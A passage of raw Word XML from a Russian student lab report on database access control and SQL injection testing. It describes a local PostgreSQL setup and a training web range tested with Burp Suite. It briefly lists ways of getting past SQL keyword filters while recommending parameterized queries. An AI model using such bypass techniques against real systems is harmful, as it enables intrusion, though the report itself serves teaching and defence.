          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Фильтрация ключевых слов и символов не является полноценной защитой. SQL допускает множество способов обхода: комментарии вместо пробелов, изменение регистра, URL-кодирование, конкатенацию строк, альтернативные операторы и функции. Поэтому фильтры могут использоваться только как дополнительный слой контроля, но не должны заменять параметризованные запросы и корректную архитектуру доступа к данным.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06757925" w14:textId="3D981DCE" w:rsidR="009D3CCE" w:rsidRDefault="009D3CCE" w:rsidP="00FB440B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B52B39" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRDefault="00C53ADA" w:rsidP="00830F2D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc229005041"/>
      <w:r>
        <w:t>Результаты работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="76439120" w14:textId="7BE872BE" w:rsidR="00160CFD" w:rsidRDefault="00572DB0" w:rsidP="00572DB0">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc229005042"/>
      <w:r>
        <w:t>Используемая среда и исходные данные</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="42C6B84C" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:t xml:space="preserve">Работа выполнялась в двух независимых средах. Первая часть была выполнена локально в базе данных subd_lab3, развернутой в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-контейнере </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 16. Подключение выполнялось из WSL через клиент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> по адресу 127.0.0.1, порт 35432, пользователь lab3_admin. Все действия были оформлены в виде SQL-скриптов и логов выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC8D83" w14:textId="538A443B" w:rsidR="00572DB0" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:t xml:space="preserve">Вторая часть выполнялась на удаленном учебном </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-стенде </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cheerful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-Island. Для анализа использовались браузер и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite Community. Все запросы отправлялись вручную через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, что позволило контролировать каждый </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и фиксировать ответы сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DEC49" w14:textId="47EF108A" w:rsidR="00C2601B" w:rsidRPr="00B8085B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Таблица 2 – Используемая среда</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3610"/>
        <w:gridCol w:w="6302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="49402126" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27DE591B" w14:textId="2AB897C5" w:rsidR="00C2601B" w:rsidRPr="00E56B7C" w:rsidRDefault="00C2601B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="180D1736" w14:textId="12CA1924" w:rsidR="00C2601B" w:rsidRPr="00E56B7C" w:rsidRDefault="00C2601B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="168F89F1" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B12E0EF" w14:textId="0D1C6901" w:rsidR="00C2601B" w:rsidRPr="00B8085B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>ОС и окружение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4C0CB1" w14:textId="2760DD10" w:rsidR="00C2601B" w:rsidRPr="009D6DEB" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="0068698C">
              <w:t>Windows + WSL Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="7DEBBADC" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2128B666" w14:textId="75DDED60" w:rsidR="00C2601B" w:rsidRPr="00B8085B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>СУБД первой части</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31EA2073" w14:textId="00FBC5FA" w:rsidR="00C2601B" w:rsidRPr="009D6DEB" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0068698C">
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0068698C">
              <w:t xml:space="preserve"> 16 в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0068698C">
              <w:t>Docker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0068698C">
              <w:t>-контейнере</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="63F63C20" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1ADD05B5" w14:textId="5DE86599" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>База данных первой части</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C30B757" w14:textId="55E6C4D0" w:rsidR="00C2601B" w:rsidRPr="00E5536B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="0068698C">
              <w:t>subd_lab3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="609BD348" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D34A70A" w14:textId="378E83D0" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Порт подключения первой части</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F8D8A4" w14:textId="111933DC" w:rsidR="00C2601B" w:rsidRPr="00E5536B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="0068698C">
              <w:t>35432</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="7338ADB4" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01817DA0" w14:textId="7163853F" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Пользователь первой части</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FBD10C1" w14:textId="0EE74B21" w:rsidR="00C2601B" w:rsidRPr="00E5536B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="0068698C">
              <w:t>lab3_admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="137788B2" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="511F62EA" w14:textId="11FBB50E" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Инструменты первой части</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C2285E5" w14:textId="5A39DA0C" w:rsidR="00C2601B" w:rsidRPr="00E5536B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0068698C">
              <w:t>psql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0068698C">
              <w:t>, SQL-скрипты, журналы выполнения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="1F8EA762" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5861DA2C" w14:textId="005D949C" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">Инструменты </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>-части</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CFBB655" w14:textId="786EECE0" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp Suite Community, Burp Repeater, </w:t>
            </w:r>
            <w:r w:rsidRPr="0068698C">
              <w:t>браузер</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="1725DE01" w14:textId="77777777" w:rsidTr="007D36DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39BEBF1A" w14:textId="211AD2D4" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>-стенд</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B6213C" w14:textId="52824A81" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cheerful-Island, UUID 281597ea-a798-410d-9e81-43bb6b4ce978</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00910B65" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Таблица 3 – Контроль исходных данных первой части</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4661"/>
        <w:gridCol w:w="5251"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="6DF8EB93" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="576EE49A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Проверка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5444C9A7" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="3CA58770" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0172536D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">Количество записей в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>documents</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5360" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19F73B2A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="0F90A3FA" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3549961D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">Количество записей в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_operations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5360" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63109E2A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="293E7E69" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AEF64D1" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Несекретные документы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5360" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CFB8C35" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="70DB20F7" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D843B9D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Документы ДСП</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5360" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34EFDC17" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="792945B7" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="218C8FEE" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Документы секретно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5360" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="287A5C07" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="4DC0551E" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F648121" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Документ с полным набором операций</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5360" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DBAAE60" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>DOC-009: 3 операции, 3 различных типа</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E1EA5E4" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B"/>
    <w:p w14:paraId="42A98D01" w14:textId="25086C46" w:rsidR="00572DB0" w:rsidRDefault="00FB440B" w:rsidP="00572DB0">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc229005043"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Реляционная схема первой части</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5C6238B6" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В первой части были использованы отношения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>documents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document_operations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, разработанные ранее по варианту № 8. Таблица </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>documents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> хранит сведения о документах организации, а таблица </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document_operations</w:t>
      </w:r>
